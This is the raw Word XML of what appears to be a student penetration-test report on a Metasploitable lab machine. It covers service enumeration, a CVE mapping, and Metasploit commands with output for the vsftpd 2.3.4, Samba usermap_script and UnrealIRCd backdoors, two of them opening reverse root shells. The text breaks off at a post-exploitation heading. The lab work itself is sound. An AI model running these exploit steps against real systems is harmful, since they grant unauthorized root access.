              <w:t>FTP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6651D4" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4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5DFF7E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905B53" w14:paraId="00EF35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6F4ADE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000"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97DD6C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16499B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH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12AEB0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian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C48356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</w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="7A8207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93095" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000"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9A768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084015" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telnet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8F56D9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Linux telnetd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0387EB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905B53" w14:paraId="399EFF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78F834" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>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D6E2CB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C761E9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP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03EB28" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache httpd 2.2.8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612A42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</w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="6FC8D3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C8C69A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>139 / 445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77B4F8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6682AE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SMB / NetBIOS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03F54" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba smbd 3.0.20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7A457E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905B53" w14:paraId="57DE22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6CA88E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306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8AFEDE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055BB" w14:textId="77777777" w:rsidR="00905B53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C59A8F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL 5.0.51a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C73F8F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</w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="342094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CEE80E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5432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A94C29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DB8A19" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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4DCCAD" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL 8.3.0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B202C1" w14:textId="77777777" w:rsidR="00905B53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905B53" w14:paraId="5AC5F1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E76222" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5900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ACA9B7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F79285" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VNC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BCC545" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VNC Protocol 3.3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E8B072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</w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="07E69A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BEB381" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6667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F945E4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FAF034" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IRC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DDD375" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UnrealIRCd 3.2.8.1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05FDCE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905B53" w14:paraId="02E313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C427CE" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8180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37EB17" w14:textId="77777777" w:rsidR="00905B53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42C8B7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP-Alt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1AFBE2" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache Tomcat/Coyote 5.5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3DDA0D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</w:tr>
    </w:tbl>
    <w:p w14:paraId="5C6EA80D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53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8242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="2D67E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1E32D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0E507C5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Vulnerability Identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0578F664" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C910378" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Searchsploit — Offline CVE Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323EBB5B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Searchsploit was used to query the local Exploit-DB database for known exploits matching the identified service versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA664B5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searchsploit vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297234A5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searchsploit samba 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A5CF5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searchsploit UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EACF3A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searchsploit apache 2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B2C0C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Metasploit Module Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5A9EB" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The Metasploit Framework console was used to locate exploit modules for each target service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557462E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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0228A7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&gt; search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE837C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&gt; search samba usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166E66B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&gt; search unreal ircd 3281</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A25D75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&gt; search tomcat manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E80908" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 CVE &amp; Risk Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF1BE0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="80" w:after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920"/>
        <w:gridCol w:w="1553"/>
        <w:gridCol w:w="825"/>
        <w:gridCol w:w="1214"/>
        <w:gridCol w:w="1448"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="5B46D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D1B0B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35774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ECAB1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CVE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2C212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CVSS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BD0E1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92541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Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="073F7E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9072B8" w14:textId="77777777" w:rsidR="00905B5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8DDD6E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 Backdoor Command Exec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747D9B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2011-2523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03896F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0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BC5745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6CB3EF" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="500B82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DE9105" w14:textId="77777777" w:rsidR="00905B53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6E363F" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba usermap_script 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23E906" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2007-2447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AF78B9" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.3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B7407B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31580C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="062FE9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80CD3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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60E307" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UnrealIRCd Backdoor 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F25E5B" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2010-2075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1AA898" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8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C29966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83B126" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="654088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1DC683" w14:textId="77777777" w:rsidR="00905B53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5588D3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Telnet Cleartext Transmission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6EDC99" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-1999-0619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119A2C" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5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54537D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13C384" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="795E12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BCBA84" w14:textId="77777777" w:rsidR="00905B53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4C4C85" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DVWA SQL Injection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2059D0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-89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22760D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8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17A35E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E33465" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="4B76DC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F5FD06" w14:textId="77777777" w:rsidR="00905B53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F89AC7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache Tomcat Default Credentials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6CF0E" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2009-3843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25B93" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5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FEA40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A568A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="6F858C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EE4C97" w14:textId="77777777" w:rsidR="00905B53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FD15CC" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL Anonymous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39FDE3" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2012-2122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CDD1F1" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.1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FBFAA6" w14:textId="77777777" w:rsidR="00905B53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CB5B98" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00905B53" w14:paraId="29148D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7BF4C6" w14:textId="77777777" w:rsidR="00905B53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A553A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VNC No Authentication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54714D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2006-2369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8B9201" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5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6D1419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A8AD7D" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote / No Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="147C74FF" w14:textId="77777777" w:rsidR="00905B5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905B53" w14:paraId="01AEE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127D1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05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28133DA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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E7F9FB8" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711F0EF0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Exploit 1 — vsftpd 2.3.4 Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D0DC4" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The vsftpd 2.3.4 package contained a malicious backdoor introduced by an attacker who compromised the official distribution. Sending a username ending with ":)" triggers a root shell on port 6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155E65A" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Module Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772F5D9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exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E2FB7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32896DED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&gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4AECE5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exploit &gt; set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EF83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exploit &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223431F7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[*] 192.168.56.103:21 - Banner: 220 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D931E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[*] Command shell session 1 opened (192.168.56.104 -&gt; 192.168.56.103:6200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1BD30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# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3CBBB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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B90FC" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Result: Unauthenticated root shell obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115FB66" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Exploit 2 — Samba usermap_script (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A4875" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The Samba 3.0.20 username map script option allows injection of shell metacharacters into the username field during authentication, resulting in unauthenticated remote code execution as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A6029" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Module Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267CC73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exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B4387" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA4D50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&gt; use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874C389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exploit &gt; set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E57EE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exploit &gt; set LHOST 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400145D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exploit &gt; set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219F188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exploit &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3853954B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[*] Started reverse TCP double handler on 192.168.56.104:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79934280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[*] Accepted the first client connection...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B1AB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[*] Command shell session 2 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBCB40" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Result: Reverse root shell via SMB exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E10CA7" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Exploit 3 — UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AF1133" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A backdoor was introduced into the UnrealIRCd 3.2.8.1 source code. Sending a string beginning with "AB;" to the IRC port triggers execution of arbitrary system commands as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33A3A5" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Module Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19F423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exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7E504" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D99F80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&gt; use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8AB3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lastRenderedPageBreak/>
        <w:t>msf6 exploit &gt; set RHOSTS 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C71C3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exploit &gt; set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07851318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exploit &gt; set LHOST 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A3D9D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msf6 exploit &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A64DC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[*] Connected to 192.168.56.103:6667...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC27F0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[*] Command shell session 3 opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4D7C4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# id &amp;&amp; uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0628CF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uid=0(root) gid=0(root)   Linux metasploitable 2.6.24-16-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69586649" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Result: Root shell via IRC backdoor exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58FD98" w14:textId="77777777" w:rsidR="00905B5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7813"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905B53" w14:paraId="46EFE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5B2D2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06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9A9ECD8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Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CF27E16" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00905B53">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDC06E0" w14:textId="77777777" w:rsidR="00905B53" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
